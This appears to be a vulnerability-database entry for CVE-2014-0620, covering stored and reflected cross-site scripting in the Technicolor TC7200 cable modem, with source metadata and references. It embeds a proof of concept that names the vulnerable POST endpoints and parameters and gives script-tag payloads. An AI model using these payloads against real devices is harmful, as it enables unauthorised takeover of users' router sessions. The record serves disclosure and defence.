ID

VAR-E-201401-0170


CVE

cve_id:CVE-2014-0620

Trust: 3.0

sources: BID: 64672 // PACKETSTORM: 124648 // EXPLOIT-DB: 30668 // EDBNET: 52301 // EDBNET: 21487

EDB ID

30668


TITLE

Technicolor TC7200 - Multiple Cross-Site Scripting Vulnerabilities - Hardware webapps Exploit

Trust: 0.6

sources: EXPLOIT-DB: 30668

DESCRIPTION

Technicolor TC7200 - Multiple Cross-Site Scripting Vulnerabilities. CVE-2014-0620CVE-101733CVE-101732 . webapps exploit for Hardware platform

Trust: 0.6

sources: EXPLOIT-DB: 30668

AFFECTED PRODUCTS

vendor:technicolormodel:tc7200scope: - version: -

Trust: 2.7

vendor:technicolormodel:tc7200 std6.01.12scope: - version: -

Trust: 0.3

sources: BID: 64672 // PACKETSTORM: 124648 // EXPLOIT-DB: 30668 // EDBNET: 52301 // EDBNET: 21487

EXPLOIT

# Exploit Title: Technicolor TC7200 - Multiple XSS Vulnerabilities
# Google Dork: N/A
# Date: 02-01-2013
# Exploit Author: Jeroen - IT Nerdbox
# Vendor Homepage:
http://www.technicolor.com/en/solutions-services/connected-home/modems-gatew
ays/cable-modems-gateways/tc7200-tc7300
# Software Link: N/A
# Version: STD6.01.12
# Tested on: N/A
# CVE : CVE-2014-0620
#
# Proof of Concept:
#
#
## Persistent Cross Site Scripting:
#
# POST : http://<ip>/parental/website-filters.asp
# Parameters:
#
# WebFilteringTable 0
# WebFilteringChangePolicies 0
# WebFiltersADDKeywords
# WebFilteringdomainMode 0
# ADDNewDomain <script>alert('IT Nerdbox');</script>
# WebFiltersKeywordButton 0
# WebFiltersDomainButton 1
# WebPolicyName
# WebFiltersRemove 0
# WebFiltersADD 0
# WebFiltersReset 0
#
#
## Reflected Cross Site Scripting
#
# POST : http://<ip>//goform/status/diagnostics-route
# Parameters:
#
# VmTracerouteHost "><script>alert('IT Nerdbox');</script>
# VmMaxTTL 30
# VmTrIsInProgress 0
# VmTrUtilityCommand 1
#
# Check out the video at: http://www.nerdbox.it/technicolor-tc7200-xss-vulnerabilities/

Trust: 1.0

sources: EXPLOIT-DB: 30668

EXPLOIT LANGUAGE

txt

Trust: 0.6

sources: EXPLOIT-DB: 30668

PRICE

free

Trust: 0.6

sources: EXPLOIT-DB: 30668

TYPE

Multiple Cross-Site Scripting Vulnerabilities

Trust: 1.0

sources: EXPLOIT-DB: 30668

TAGS

tag:exploit

Trust: 0.5

tag:vulnerability

Trust: 0.5

tag:xss

Trust: 0.5

sources: PACKETSTORM: 124648

CREDITS

Jeroen - IT Nerdbox

Trust: 0.6

sources: EXPLOIT-DB: 30668

EXTERNAL IDS

db:NVDid:CVE-2014-0620

Trust: 3.0

db:EXPLOIT-DBid:30668

Trust: 1.6

db:EDBNETid:52301

Trust: 0.6

db:0DAYTODAYid:21726

Trust: 0.6

db:EDBNETid:21487

Trust: 0.6

db:PACKETSTORMid:124648

Trust: 0.5

db:BIDid:64672

Trust: 0.3

sources: BID: 64672 // PACKETSTORM: 124648 // EXPLOIT-DB: 30668 // EDBNET: 52301 // EDBNET: 21487

REFERENCES

url:https://nvd.nist.gov/vuln/detail/cve-2014-0620

Trust: 2.7

url:https://www.exploit-db.com/exploits/30668/

Trust: 0.6

url:https://0day.today/exploits/21726

Trust: 0.6

url:http://www.nerdbox.it/technicolor-tc7200-xss-vulnerabilities/

Trust: 0.3

url:http://www.technicolorbroadbandpartner.com/

Trust: 0.3

sources: BID: 64672 // PACKETSTORM: 124648 // EXPLOIT-DB: 30668 // EDBNET: 52301 // EDBNET: 21487

SOURCES

db:BIDid:64672
db:PACKETSTORMid:124648
db:EXPLOIT-DBid:30668
db:EDBNETid:52301
db:EDBNETid:21487

LAST UPDATE DATE

2022-07-27T09:42:47.205000+00:00


SOURCES UPDATE DATE

db:BIDid:64672date:2014-01-02T00:00:00

SOURCES RELEASE DATE

db:BIDid:64672date:2014-01-02T00:00:00
db:PACKETSTORMid:124648date:2014-01-02T14:04:44
db:EXPLOIT-DBid:30668date:2014-01-03T00:00:00
db:EDBNETid:52301date:2014-01-03T00:00:00
db:EDBNETid:21487date:2014-01-03T00:00:00